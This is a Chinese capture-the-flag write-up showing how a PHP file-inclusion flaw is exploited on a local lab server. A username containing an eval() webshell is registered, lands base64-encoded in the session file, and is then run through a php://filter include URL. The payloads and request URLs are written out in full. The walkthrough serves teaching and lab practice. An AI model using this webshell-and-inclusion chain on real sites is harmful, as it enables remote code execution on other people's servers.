文件包含漏洞之包含SESSION(CTF题目)

这次使用的环境是ubuntu+nginx+php+mysql

首先四个文件源码在以下链接中:

一道CTF题:PHP文件包含 | Chybeta

我们注册一个用户名111密码111,然后登录查看cookie和linux的session,因为我们的de服务器

是手动搭建的,所以容易知道session的位置。

我们查看这个session:

复制代码
cd /var/lib/php/sessions

发现我们的用户名以base64编码的格式放在了session中,因此我们只要把含有木马的用户名注册了,这个木马就会以base64编码的格式放在session中,并且路径我们也是知道的。

我们把一句话木马注册,可以看到木马已经被放进数据库里面了,session中也存在

15

复制代码
192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_hej7e9k4vjusbpumknkvsks5f1

但是上面的payload不能执行,因为session中还包含着15位的前缀,需要让其乱码

需要重新注册一个base64编码后的名字长度大于100的

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>

重复上述步骤

注册这个用户名:

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>
复制代码
http://192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_bhbl2nhonauub8vko76g2ublkt&atebyhc=phpinfo();

成功!

相关推荐
你觉得脆皮鸡好吃吗13 分钟前
OAuth学习 下
网络·安全·web安全·网络安全学习
NOVAnet202321 分钟前
SaaS 化 MDR 安全运营平台技术架构解析:态势感知、关联研判与自动化响应实践
安全·架构·自动化
飞斯柯罗28 分钟前
[飞斯柯罗] 想了解什么是网络安全资产和 KMS?
网络·安全·web安全
运维大师1 小时前
【安全与故障排查】06-【复盘】生产数据库删库事故:RTO4小时恢复纪实
数据库·安全
带娃的IT创业者11 小时前
突破算力与安全的边界:深度解析 Mythos AI 的“受信发布”机制与技术影响
人工智能·安全·大语言模型·ai安全·mythos ai·受信发布·ai监管
落寞的星星11 小时前
引言:加密不等于安全
安全
SRET12 小时前
Mineradio 沙盒隔离安装完全指南 | 一键安全运行 Electron 应用!!!
javascript·经验分享·安全·electron·aigc·音视频·ai编程
全栈前端老曹12 小时前
【MongoDB】安全与权限管理 —— 用户认证、角色权限、SSL 加密
前端·javascript·数据库·安全·mongodb·nosql·ssl
星河耀银海12 小时前
大模型安全:对抗攻击与防御方法
人工智能·安全·大模型
广东帝工智能安防12 小时前
智能设防精准预警,筑牢内河桥梁通航安全防护网
安全·桥梁防撞·智慧航道·防撞预警系统